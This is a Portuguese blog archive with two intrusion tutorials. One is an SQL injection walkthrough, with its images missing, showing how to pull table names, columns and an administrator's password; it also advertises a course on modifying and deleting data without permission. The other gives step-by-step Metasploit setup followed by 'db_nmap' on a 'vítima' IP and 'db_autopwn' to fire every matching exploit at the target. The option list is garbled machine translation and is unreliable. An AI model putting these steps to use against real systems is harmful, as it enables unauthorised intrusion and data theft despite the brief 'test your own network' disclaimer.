Arquivo da categoria ‘DB’

Uma das formas mais fáceis de si descobrir nomes de tabelas é o uso do comando, show:

sqlinjection

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Agora, vou tentar listar do banco de dados werp, O nome da tabela de usuarios, Geralmente os nomes das tabelas são: users, roots,usuarios…Vamos ver qual o nome:

sqlinjection_tabelas

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Agora, eu já sei o nome do banco de dados, e também sei o nome das tabelas que tem no database, inclusive a de usuarios, agora, eu quero saber o nome das colunas da tabela usuarios.

3

 

 

 

 

 

 

 

 

 

 

 

 

Agora, vou listar o nome do usuário administrador e a senha do usuário:

4

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Conclusão:

 

Aqui, você aprendeu listar todos databases do banco de dados, Listar todas as tabelas do database, Listar todas as colunas das tabelas,  Listar dados das colunas.

Existem varias maneiras de fazer isso. Eu só estou ensinando uma das maneiras aqui.

curso sqlinjection, apostila sqlinjection

 

Dentre os assuntos que são ensinados aqui, são:

Mysql básico

Criando uma query

Principio do sqlinjection

O que é sqlinjection

Teoria de sqlinjection

Regras sqlinjection

Criando um sistema de login E senha para testes

Listar dados do banco de dados com sqlinjection

Burlar uma query

Burlar um sistema de login e senha

Conseguir acesso ao banco de dados

Conseguir privilégios em um sistema

Conseguir dados de um sistema

Usando parâmetro UNION

Inserindo dados no banco de dados sem permissão

Alterando dados do banco de dados sem permissão

Excluindo dados do banco de dados sem permissão

Excluindo tabelas do banco de dados sem permissão

Excluindo database sem permissão

Descobrir nomes de tabelas do banco de dados

Descobrir nome das colunas do banco de dados

Protegendo sistema de login e senha

Protegendo dados do banco

Proteção na query

Emunizando site, sistema… do sqlinjection

Para você aprender com precisão este curso você precisa de saber:

Básico em linguagem de programação

Básico em banco de dados

Minha intencao era vender esta apostila porem, nao quero mais vender, achei um jeito melhor de disponibilizar gratuitamente, este curso sqlinjection.  Nao vai precisar de voce gastar nenhum dinheiro para adquirir esta apostila.

Quem quiser este curso, precisa me mandar um email:

juancarloscunha606@hotmail.com, que eu falarei. como conseguir esta apostila de sqlinjection. Que é tambem um curso de sqlinjection.

Auto Exploração

Criei este post com bastante explicação para todos do meu blog. Esta é uma técnica avançada do metasploit, porem muito fácil de si fazer, Todos podem tentar que vão dar conta numa boa.

Esta explicação é para o linux, Entretanto para aqueles que usam windows… Podem ficar despreocupados, pois vou criar um tutorial de auto-exploraçao para windows.

Para quem não sabe o que é a auto exploração, vou explicar… Este é o método mais eficaz para quem quer testar sua rede ou seu próprio computador. A AUTO EXPLORAÇAO consiste em testar cada um dos exploits do seu metasploit no alvo definido pelo atacante.

Eu sei que todos já sabem o que é metasploit, por isso não vou precisar ficar dizendo toda vez que eu for criar um post sobre o metasploit, E para quem não sabe… Veja outros posts deste mesmo site.

Com Esta ferramenta avançada, “qualquer pessoa, pode testar sua própria rede, suas plataformas, sistemas operacionais e sistemas do seu computador.

O metasploit Pode ser baixado em diversos lugares, porem aconselho a baixarem do próprio site.http://metasploit.org

Vamos começar agora, já Instalando. Quem já tem instalado pode pular esta parte

Faça o download do Metasploit. Link direto ou instale do jeito que voce deseja:
http://metasploit.org/framework/downloa … 3.2.tar.gz

Agora vamos descompactar e utilizar. Entre no console, vá ao diretório que foi salvo o metasploit e faça:

$ tar -xzvf framework-3.2.tar.gz

Entre no diretório com o comando:

$ cd framework-3.1

E execute o programa, no caso o console. Com o comando:

$ ./msfconsole

Auto Exploração

A auto exploração do metasploit consiste em scans feitos na vitima e com base em portas abertas, seleciona os exploits e testa exploit por exploit. Sendo assim, depois de configurado o metasploit faria o papel de uma invasão com apenas uma linha de comando.

Vou lembrar vocês de uma coisa, VOU ensinar vocês a testarem suas rede e sistemas. NÃO USEM ESSA FERRAMENTA PARA O MAL!!!

VAMOS LÁ

Agora precisamos instalar o Postgres. De o comando:

# yum install postgres

Após a instalação do postgres é nescessario ruby. Instale o ruby e rubygems

# yum install ruby rubygems

vamos agora instalar Active Record e Postgresql.

# gem install activerecord

# gem install postgresql.

Precisamos criar agora, tabelas para serem usadas pela auto exploraçao.

As informações do servidor, portas abertas e exploits utilizados são armazenadas em um banco de dados do postgres. Certificando que o serviço Postgres esta rodando em seu sistema, vamos criar as tabelas:

# su – postgres

$ psql -d template1 -U postgres

Estamos dentro do console do postgres, aqui iremos criar nossas tabelas.

Welcome to psql 7.4.16, the PostgreSQL interactive terminal.

Type: \\copyright for distribution terms
\\h for help with SQL commands
\\? for help on internal slash commands
\\g or terminate with semicolon to execute query
\\q to quit

template1=#

template1=# CREATE USER root WITH PASSWORD ‘minha senha’;
template1=# CREATE DATABASE metasploit3;
template1=# GRANT ALL PRIVILEGES ON DATABASE metasploit3 to root;
template1=# \q

Criada nossa tabela, está tudo pronto para iniciar nossa auto exploração. Inicie o metasploit.

# cd framework-3.2 //ou qual versão você estiver instalada

# ./msfconsole

Dentro do console Metasploit, digite os comandos:

. load db_postgres

. db_create (em casos de erros, ignore.)

. db_hosts

. db_nmap “ip da vitima”

Após o programa fazer o scan, O metasploit ira jogar o scaneamento para o banco de dados. AGORA VEM A MELHOR PARTE, Após o scan, execute o comando

db_autpwn -p -t –e

O Metasploit ira executar exploit por exploit.

Aqui vai alguns argumentos para o db_autopwn:

-h indica este texto de ajuda

-t Show all matching exploit modules
-x mostra todos os módulos de harmonização da façanha
-p módulos seletos baseados em portas abertos

-e Façanhas do lançamento de encontro a todos os alvos combinados
-s Obter somente um único escudo por o sistema de alvo (NON-FUNCTIONAL)
-r Use um reverso escudo para conectar
-b Use um escudo do ligamento em um porta aleatória
-I [escala] Somente anfitriões da façanha dentro desta escala
-X [escala] Exclua sempre anfitriões dentro desta escala

OBS: SI AO COMEÇAR INSTALAR O POSTGRE E DER ALGUM ERRO, PESQUISE NO GOOGLE, COMO INSTALAR POSTGRE,  DAI, SERÁ MAIS FACIL DE RESOLVER.

Fonte: Invasao